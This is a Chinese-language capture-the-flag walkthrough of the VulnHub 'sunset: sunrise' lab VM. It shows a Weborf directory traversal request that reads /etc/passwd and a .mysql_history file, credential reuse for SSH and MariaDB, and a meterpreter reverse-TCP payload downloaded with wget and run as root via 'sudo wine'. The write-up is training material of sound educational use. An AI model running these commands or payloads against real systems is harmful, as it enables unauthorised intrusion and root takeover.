vulnhub靶机渗透[sunset-sunrise]

Posted on 2019-12-24 Edited on 2020-08-17 In vulnhub walkthrough Views: Word count in article: 3.4k Reading time ≈ 12 mins.

名称：日落：日出
发布日期：2019年12月6日

下载：

Download: https://mega.nz/#!IKQQ2SxZ!anBsBnlQrYh2ELYWYa1mHYKG_7kRw402zfo2WOOB8Z0
Download (Mirror): https://download.vulnhub.com/sunset/sunrise.7z
Download (Torrent): https://download.vulnhub.com/sunset/sunrise.7z.torrent

描述：

说明：玩得开心！
难度：初学者
联系人：@whitecr0wz

信息收集

上nmap

root@kali:~# nmap -sn -v 192.168.56.0/24
Nmap scan report for 192.168.56.104
Host is up (0.00027s latency).
MAC Address: 08:00:27:67:12:DE (Oracle VirtualBox virtual NIC)

root@kali:~# nmap -A -v -sS -sV -Pn -T5 -p- --script=vuln 192.168.56.104
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp   open  http       Apache httpd 2.4.38
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /: Root directory w/ listing on 'apache/2.4.38 (debian)'
|_http-server-header: Apache/2.4.38 (Debian)
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.56.104:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=D%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=M%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=S%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|_    http://192.168.56.104:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3306/tcp open  mysql?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   NULL: 
|_    Host '192.168.56.102' is not allowed to connect to this MariaDB server
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
8080/tcp open  http-proxy Weborf (GNU/Linux)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Page not found: Weborf (GNU/Linux)
|     Content-Length: 202
|     Content-Type: text/html
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
|   GetRequest: 
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Content-Length: 326
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="html/">html/</a></td><td>-</td></tr>
|     </table><p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
|   HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
|     DAV: 1,2
|     DAV: <http://apache.org/dav/propset/fs/1>
|     MS-Author-Via: DAV
|   Socks5: 
|     HTTP/1.1 400 Bad request: Weborf (GNU/Linux)
|     Content-Length: 199
|     Content-Type: text/html
|_    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 400</H1>Bad request <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| http-enum: 
|   /../../../../../../../../../../etc/passwd: Possible path traversal in URI
|   /../../../../../../../../../../boot.ini: Possible path traversal in URI
|_  /html/: Potentially interesting folder
|_http-server-header: Weborf (GNU/Linux)

访问http://192.168.56.104:8080/，发现是Weborf/0.12.2

现在使用searchsploit搜索Weborf。如果没有成功，尝试其他方法。但是成功了。说此版本的Weborf容易受到目录遍历攻击。下载漏洞利用程序的内容，以获取相关信息。漏洞利用提供了一条易受攻击的方法。尝试一下。

root@kali:~# searchsploit Weborf 0.12.2
-------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                |  Path
                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------- ----------------------------------------
weborf 0.12.2 - Directory Traversal                           | exploits/linux/remote/14925.txt
-------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~# searchsploit -m 14925
  Exploit: weborf 0.12.2 - Directory Traversal
      URL: https://www.exploit-db.com/exploits/14925
     Path: /usr/share/exploitdb/exploits/linux/remote/14925.txt
File Type: ASCII text, with CRLF line terminators

Copied to: /root/14925.txt


root@kali:~# cat 14925.txt 
Title: Weborf httpd <= 0.12.2 Directory Traversal Vulnerability
Date: Sep 6, 2010
Author: Rew
Link: http://galileo.dmi.unict.it/wiki/weborf/doku.php
Version: 0.12.2
Tested On: Debian 5
CVE: N/A

=============================================================

Weborf httpd <= 0.12.2 suffers a directory traversal
vulnerability.  This vulnerability could allow
attackers to read arbitrary files and hak th3 plan3t.

instance.c : line 240-244
------------------------------
void modURL(char* url) {
    //Prevents the use of .. to access the whole filesystem  <-- ORLY?
    strReplace(url,"../",'\0');

    replaceEscape(url);
------------------------------

Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

==============================================================

Stay safe,
Over and Outr

按照exp中的利用方法构造如下poc并访问

1	http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

现在，能在目标计算机内四处查找文件。决定在用户Sunrise的主目录中进行文件查看。遇到了一个user.txt文件。

1	http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f

打开user.txt查找文本，如下所示。是一个简单的user的flag。

1	a6050aecf6303b0b824038807d823a89

接下来对下面url爆破一波

1	http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f

root@kali:~# dirb http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Dec 25 03:38:57 2019
URL_BASE: http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/ ----
+ http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.bashrc (CODE:200|SIZE:3526)
+ http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.mysql_history (CODE:200|SIZE:83)
+ http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.profile (CODE:200|SIZE:807)
                                                                               %2fweborf%2f/zt               
-----------------
END_TIME: Wed Dec 25 03:39:12 2019
DOWNLOADED: 4612 - FOUND: 3

访问下面url可得

1	http://192.168.56.104:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.mysql_history

1 2	show databases; ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';

getshell

使用用户名和密码weborf/iheartrainbows44成功连接ssh

root@kali:~# ssh weborf@192.168.56.104
The authenticity of host '192.168.56.104 (192.168.56.104)' can't be established.
ECDSA key fingerprint is SHA256:4yaOo7mwlBs//3V1VVqqtiApksgelyI4AJwhIUfz0UQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.104' (ECDSA) to the list of known hosts.
weborf@192.168.56.104's password: 
Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec  5 16:24:32 2019 from 192.168.1.146
weborf@sunrise:~$ id
uid=1001(weborf) gid=1001(weborf) groups=1001(weborf)
weborf@sunrise:~$ whoami
weborf
weborf@sunrise:~$ pwd
/home/weborf

提权

连接数据库获取用户名和密码

weborf@sunrise:~$ mysql -uweborf -piheartrainbows44
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 37
Server version: 10.3.18-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
3 rows in set (0.028 sec)

MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mysql]> show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| column_stats              |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| transaction_registry      |
| user                      |
+---------------------------+
31 rows in set (0.000 sec)
MariaDB [mysql]> select * from user;
+-----------+---------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-------------+-------------------------------------------+------------------+---------+--------------+--------------------+
| Host      | User    | Password                                  | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv | Create_tablespace_priv | Delete_history_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections | max_user_connections | plugin      | authentication_string                     | password_expired | is_role | default_role | max_statement_time |
+-----------+---------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-------------+-------------------------------------------+------------------+---------+--------------+--------------------+
| localhost | root    | *C7B6683EEB8FF8329D8390574FAA04DD04B87C58 | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      | Y                   |          |            |             |              |             0 |           0 |               0 |                    0 | unix_socket | *AF554C323F838EB43A3D464034692C0994346ED8 | N                | N       |              |           0.000000 |
| localhost | sunrise | thefutureissobrightigottawearshades       | N           | N           | N           | N           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                | N                | N              | N                   | N                  | N                | N          | N            | N                      | N                   |          |            |             |              |             0 |           0 |               0 |                    0 |             |                                           | N                | N       |              |           0.000000 |
| localhost | weborf  | *A76018C6BB42E371FD7B71D2EC6447AE6E37DB28 | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | N          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      | Y                   |          |            |             |              |             0 |           0 |               0 |                    0 |             |                                           | N                | N       |              |           0.000000 |
+-----------+---------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-------------+-------------------------------------------+------------------+---------+--------------+--------------------+
3 rows in set (0.000 sec)

将root的hash值解密得到purplerain54732,直接root用户登录完成提权

weborf@sunrise:~$ su root
Password: 
root@sunrise:/home/weborf# ls
weborf-0.12.2
root@sunrise:/home/weborf# id
uid=0(root) gid=0(root) groups=0(root)
root@sunrise:/home/weborf# whoami
root

得到flag

root@sunrise:/home/weborf# cd /root
root@sunrise:~# ls
Desktop  Documents  Downloads  Groups  Logs  Manual  Music  Pictures  Public  Readme  root.txt  Templates  Users  Videos
root@sunrise:~# cat root.txt
            ^^                   @@@@@@@@@
       ^^       ^^            @@@@@@@@@@@@@@@
                            @@@@@@@@@@@@@@@@@@              ^^
                           @@@@@@@@@@@@@@@@@@@@
 ~~~~ ~~ ~~~~~ ~~~~~~~~ ~~ &&&&&&&&&&&&&&&&&&&& ~~~~~~~ ~~~~~~~~~~~ ~~~
 ~         ~~   ~  ~       ~~~~~~~~~~~~~~~~~~~~ ~       ~~     ~~ ~
   ~      ~~      ~~ ~~ ~~  ~~~~~~~~~~~~~ ~~~~  ~     ~~~    ~ ~~~  ~ ~~
   ~  ~~     ~         ~      ~~~~~~  ~~ ~~~       ~~ ~ ~~  ~~ ~
 ~  ~       ~ ~      ~           ~~ ~~~~~~  ~      ~~  ~             ~~
       ~             ~        ~      ~      ~~   ~             ~

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

24edb59d21c273c033aa6f1689b0b18c

What a beautiful sunrise!!!

Other way

如果root的hash值解密不出来，还可以使用sunrise/thefutureissobrightigottawearshades登录，然后提权，密码拆开正常排序发现是

1 2	the future is so bright i gotta wear shades (未来是如此光明，以至于我必须戴上墨镜)

成功登录

weborf@sunrise:~$ su sunrise                                                                                                                                                                                                               
Password:                                                                                                                                                                                                                                  
sunrise@sunrise:/home/weborf$ id                                                                                                                                                                                                           
uid=1000(sunrise) gid=1000(sunrise) groups=1000(sunrise),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)                                                                 
sunrise@sunrise:/home/weborf$ whoami                                                                                                                                                                                                       
sunrise

下面是提权进程，基本不需要各种提权脚本，手动更快更准

sunrise@sunrise:~$ sudo -l
[sudo] password for sunrise:                                                                                                                                                                                                               
Matching Defaults entries for sunrise on sunrise:                                                                                                                                                                                          
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin                                                                                                                                 
                                                                                                                                                                                                                                           
User sunrise may run the following commands on sunrise:                                                                                                                                                                                    
    (root) /usr/bin/wine

sunrise@sunrise:~$ cd /tmp

Wine（Wine不是模拟器的递归反义词）是一个免费的开放源代码兼容性层，旨在使为Microsoft Windows开发的计算机程序（应用程序软件和计算机游戏）能够在类似Unix的操作系统上运行。

可以以root身份运行wine，创建可以使用wine执行的payload。使用msfpc进行payload创建。创建payload后，将运行python一个liner将payload传输到目标计算机。

root@kali:~# msfpc windows 192.168.56.102
 [*] MSFvenom Payload Creator (MSFPC v1.4.5)
 [i]   IP: 192.168.56.102
 [i] PORT: 443
 [i] TYPE: windows (windows/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \
  --platform windows -a x86 -e generic/none LHOST=192.168.56.102 LPORT=443 \
  > '/root/windows-meterpreter-staged-reverse-tcp-443.exe'


 [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

 [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
 [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!

root@kali:~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

将payload托管在攻击者的计算机上，使用wget工具将所述文件下载到目标计算机。成功将payload传输到目标计算机之后，使用wine和sudo执行有效负载。

sunrise@sunrise:/tmp$ wget http://192.168.56.102:8000/windows-meterpreter-staged-reverse-tcp-443.exe
--2019-12-25 04:29:12--  http://192.168.56.102:8000/windows-meterpreter-staged-reverse-tcp-443.exe
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73802 (72K) [application/x-msdos-program]
Saving to: ‘windows-meterpreter-staged-reverse-tcp-443.exe’

windows-meterpreter-staged-reverse-tcp-443.exe             100%[=======================================================================================================================================>]  72.07K  --.-KB/s    in 0s      

2019-12-25 04:29:12 (439 MB/s) - ‘windows-meterpreter-staged-reverse-tcp-443.exe’ saved [73802/73802]

sunrise@sunrise:/tmp$ sudo wine windows-meterpreter-staged-reverse-tcp-443.exe
[sudo] password for sunrise:

使用msfpc工具生成payload时，还将运行payload侦听器所需的配置来生成Metasploit Framework ruby文件。运行了该ruby文件，在该目标计算机上使用wine运行该文件时。看到一个session弹出。由于该文件是使用具有root特权shell的wine执行的，因此我们也获得了root权限。遍历到根目录，当列出该目录中的所有文件时，找到root.txt的文件。

root@kali:~# msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'                                                                                                                                                    
[*] Processing /root/windows-meterpreter-staged-reverse-tcp-443-exe.rc for ERB directives.                                                                                                                                                 
resource (/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> use exploit/multi/handler                                                                                                                                              
resource (/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> set PAYLOAD windows/meterpreter/reverse_tcp                                                                                                                            
PAYLOAD => windows/meterpreter/reverse_tcp                                                                                                                                                                                                 
resource (/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> set LHOST 192.168.56.102                                                                                                                                               
LHOST => 192.168.56.102
resource (/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> set LPORT 443
LPORT => 443
resource (/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> set ExitOnSession false
ExitOnSession => false
resource (/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.56.102:443 
msf5 exploit(multi/handler) > [*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (180320 bytes) to 192.168.56.104
[*] Meterpreter session 1 opened (192.168.56.102:443 -> 192.168.56.104:44876) at 2019-12-25 04:37:04 -0500
msf5 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > getuid
Server username: sunrise\root
meterpreter > pwd
Z:\tmp
meterpreter > cd /root
meterpreter > ls
Listing: Z:\root
================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  1602  fil   2019-12-05 17:24:31 -0500  .ICEauthority
100666/rw-rw-rw-  104   fil   2019-12-05 17:40:27 -0500  .Xauthority
100666/rw-rw-rw-  142   fil   2019-12-25 04:07:46 -0500  .bash_history
100666/rw-rw-rw-  570   fil   2010-01-31 06:52:26 -0500  .bashrc
40777/rwxrwxrwx   0     dir   2019-12-04 17:46:24 -0500  .cache
40777/rwxrwxrwx   0     dir   2019-12-04 15:48:21 -0500  .config
100666/rw-rw-rw-  35    fil   2019-12-04 15:46:34 -0500  .dmrc
40777/rwxrwxrwx   0     dir   2019-12-04 15:48:12 -0500  .gnupg
40777/rwxrwxrwx   0     dir   2019-12-04 14:29:33 -0500  .local
40777/rwxrwxrwx   0     dir   2019-12-04 17:46:29 -0500  .mozilla
100666/rw-rw-rw-  0     fil   2019-12-04 16:56:11 -0500  .odbc.ini
100666/rw-rw-rw-  148   fil   2015-08-17 11:30:33 -0400  .profile
40777/rwxrwxrwx   0     dir   2019-12-04 14:48:28 -0500  .rpmdb
100666/rw-rw-rw-  66    fil   2019-12-05 16:08:41 -0500  .selected_editor
40777/rwxrwxrwx   0     dir   2019-12-04 15:47:54 -0500  .ssh
100666/rw-rw-rw-  252   fil   2019-12-05 14:59:00 -0500  .wget-hsts
100666/rw-rw-rw-  2211  fil   2019-12-05 17:24:30 -0500  .xsession-errors
100666/rw-rw-rw-  2211  fil   2019-12-05 13:51:40 -0500  .xsession-errors.old
40777/rwxrwxrwx   0     dir   2019-12-04 15:46:51 -0500  Desktop
40777/rwxrwxrwx   0     dir   2019-12-04 15:46:51 -0500  Documents
40777/rwxrwxrwx   0     dir   2019-12-04 15:46:51 -0500  Downloads
40777/rwxrwxrwx   0     dir   2007-08-29 11:03:27 -0400  Groups
40777/rwxrwxrwx   0     dir   2007-08-29 11:03:27 -0400  Logs
40777/rwxrwxrwx   0     dir   2019-12-04 16:33:15 -0500  Manual
40777/rwxrwxrwx   0     dir   2019-12-04 15:46:51 -0500  Music
40777/rwxrwxrwx   0     dir   2019-12-04 15:46:51 -0500  Pictures
40777/rwxrwxrwx   0     dir   2019-12-04 15:46:51 -0500  Public
40777/rwxrwxrwx   0     dir   2019-12-04 16:33:15 -0500  Readme
40777/rwxrwxrwx   0     dir   2019-12-04 15:46:51 -0500  Templates
40777/rwxrwxrwx   0     dir   2007-08-29 11:03:26 -0400  Users
40777/rwxrwxrwx   0     dir   2019-12-04 15:46:51 -0500  Videos
100666/rw-rw-rw-  701   fil   2019-12-05 17:22:55 -0500  root.txt

meterpreter > cat root.txt
            ^^                   @@@@@@@@@
       ^^       ^^            @@@@@@@@@@@@@@@
                            @@@@@@@@@@@@@@@@@@              ^^
                           @@@@@@@@@@@@@@@@@@@@
 ~~~~ ~~ ~~~~~ ~~~~~~~~ ~~ &&&&&&&&&&&&&&&&&&&& ~~~~~~~ ~~~~~~~~~~~ ~~~
 ~         ~~   ~  ~       ~~~~~~~~~~~~~~~~~~~~ ~       ~~     ~~ ~
   ~      ~~      ~~ ~~ ~~  ~~~~~~~~~~~~~ ~~~~  ~     ~~~    ~ ~~~  ~ ~~
   ~  ~~     ~         ~      ~~~~~~  ~~ ~~~       ~~ ~ ~~  ~~ ~
 ~  ~       ~ ~      ~           ~~ ~~~~~~  ~      ~~  ~             ~~
       ~             ~        ~      ~      ~~   ~             ~

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

24edb59d21c273c033aa6f1689b0b18c

帅掉渣！！！还有更多方法请通过qq告诉我，我的qq:1185151867

Game over

不好意思，这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本，i am so sorry about this…It’s a pity…

The end,to be continue…